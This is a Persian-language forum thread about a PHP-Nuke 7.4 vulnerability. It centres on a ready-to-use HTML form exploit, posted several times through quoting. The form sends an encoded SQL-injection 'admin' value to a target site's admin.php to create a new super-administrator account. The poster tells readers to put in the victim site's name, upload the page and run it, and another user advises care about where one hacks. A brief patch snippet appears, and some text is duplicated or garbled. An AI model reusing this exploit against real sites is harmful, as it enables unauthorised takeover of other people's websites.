هشدار در مورد phpnuke7.4

[Toxic_Program]

شما بايد هش ادمين رو داشته باشي كشك كه نيست

[saadatmandi]

اه راست ميگه ها !! اينجا هم هست ! :
ايناها --> http://www.mantralab.org/modules.php/mod...wAdmin+Bug

اينجا اين باگ رو انتشار داده...اوكي

[4shir]

سلام لازم ديدم چند تا مطلب رو دوباره توضيح بدم
1.اين هشي كه توي خود برنامه هست مستر حساب ميشه مثل لينكي كه اومده بود و دو سوته ادمين ميساخت اون هم از همين هش استفاده شده بود حالا اگر هم جواب نداد ميتونيد هش ادمين رو جايگزين كنيد اما با همين هش هم ميشه
2. من خودم به شخصه بر اين اعتقاد هستم اكسپوليتي ه پخش شد ديگه صاحب نداره مثلا توي سكيوريتي فكوس كه اومد توي اي سكيوريتي هم مياد توي اين سايت هم ميادپ و........ و هر كسي براش يك منبعي رو اعلام ميكنه پس منبع واقعي هيچ وقت معلوم نميشه
3. عزيز جان دليل نميشه چون توي اين سايت بوده منبع هم اينجا باشه ميخواي 10 نا لينك بدم كه توي اونا هم باشه؟
4.در مورد اشيانه تا جاي كه من بهزاد رو ميشناسم سايني رو داغون نكرده فقط صفحه اول رو عوض كردن
5. تصميم گرفتم ديگه اكسپوليت نذارم جاي بنا به دلايلي
6. حواستون به جاهاي كه هك ميكنيد باشه دليلش رو گمونم متوجه بشيد
7.فعلان باي
ساسان

[black_phantom]

خوب راه محافظتش كه تغير دادن نام پوشه ادمين هستش كد ها هم اينجا ميزارم

کد:

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
</head>
<body>
<form name="mantra" method="POST" action="http://www.target.com/admin.php">
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<input type="hidden" name="add_radminsuper" value="1">
<input type="hidden" name="op" value="AddAuthor">
<p>USERNAME:
<input type="text" name="add_aid" size="20">
<br>
NAME:
<input type="text" name="add_name" size="20">
<br>
PASSWORD:
<input type="text" name="add_pwd" size="20">
<br>
E-MAIL:
<input type="text" name="add_email" size="20">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>

</body>

</html>

اينها رو بايد بزاريد توي يك صفحه هتمل بعد به جا target اسم سايت مورد نظر رو بدين و بعدش اپلود كنيد توي هاست و بعد هم اجراش كنيد

يك راه پتچ ديگه كه الان توي اشيانه ديدم اين هست

کد:

if ( !empty($HTTP_GET_VARS['op']) ) {
$op = $HTTP_GET_VARS['op'];
}

if ( !empty($HTTP_POST_VARS['op']) ) {
$op = $HTTP_POST_VARS['op'];
}

منبع هم اشيانهsssdsfsfgsdfgdvdfgdfgsdfgdgdfgfddfg

[black_phantom]

[quote="4shir"]خوب راه محافظتش كه تغير دادن نام پوشه ادمين هستش كد ها هم اينجا ميزارم

کد:

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
</head>
<body>
<form name="mantra" method="POST" action="http://www.target.com/admin.php">
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<input type="hidden" name="add_radminsuper" value="1">
<input type="hidden" name="op" value="AddAuthor">
<p>USERNAME:
<input type="text" name="add_aid" size="20">
<br>
NAME:
<input type="text" name="add_name" size="20">
<br>
PASSWORD:
<input type="text" name="add_pwd" size="20">
<br>
E-MAIL:
<input type="text" name="add_email" size="20">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>

</body>

</html>

اينها رو بايد بزاريد توي يك صفحه هتمل بعد به جا target اسم سايت مورد نظر رو بدين و بعدش اپلود كنيد توي هاست و بعد هم اجراش كنيد

يك راه پتچ ديگه كه الان توي اشيانه ديدم اين هست
[code]

if ( !empty($HTTP_GET_VARS['op']) ) {
$op = $HTTP_GET_VARS['op'];
}

if ( !empty($HTTP_POST_VARS['op']) ) {
$op = $HTTP_POST_VARS['op'];
}

[black_phantom]

[quote="4shir"]خوب راه محافظتش كه تغير دادن نام پوشه ادمين هستش كد ها هم اينجا ميزارم

کد:

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
</head>
<body>
<form name="mantra" method="POST" action="http://www.target.com/admin.php">
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<input type="hidden" name="add_radminsuper" value="1">
<input type="hidden" name="op" value="AddAuthor">
<p>USERNAME:
<input type="text" name="add_aid" size="20">
<br>
NAME:
<input type="text" name="add_name" size="20">
<br>
PASSWORD:
<input type="text" name="add_pwd" size="20">
<br>
E-MAIL:
<input type="text" name="add_email" size="20">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>

</body>

</html>

اينها رو بايد بزاريد توي يك صفحه هتمل بعد به جا target اسم سايت مورد نظر رو بدين و بعدش اپلود كنيد توي هاست و بعد هم اجراش كنيد

يك راه پتچ ديگه كه الان توي اشيانه ديدم اين هست

کد:

if ( !empty($HTTP_GET_VARS['op']) ) {
$op = $HTTP_GET_VARS['op'];
}

if ( !empty($HTTP_POST_VARS['op']) ) {
$op = $HTTP_POST_VARS['op'];
}

منبع هم اشيانه

[kasrakhan]

دوست عزيز شما بر خلاف Tos آشيانه عمل كرده و اطلاعات آشيانه را پخش كرده ايد.

از كپي رايت آشيانه حرف مي زني ؟ آشيانه اي كه خودش باگ كشف شده رو ميدزده به اسم خودش ميزنه ؟
من يكي اينا رو ميشناسم !‌ :evil:

[ashkan]

آقاي black_phantom نبش قبر ميكني؟